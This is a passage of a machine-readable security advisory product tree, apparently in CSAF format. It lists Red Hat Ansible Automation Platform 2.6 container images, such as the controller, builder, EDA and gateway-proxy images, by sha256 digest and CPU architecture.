"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
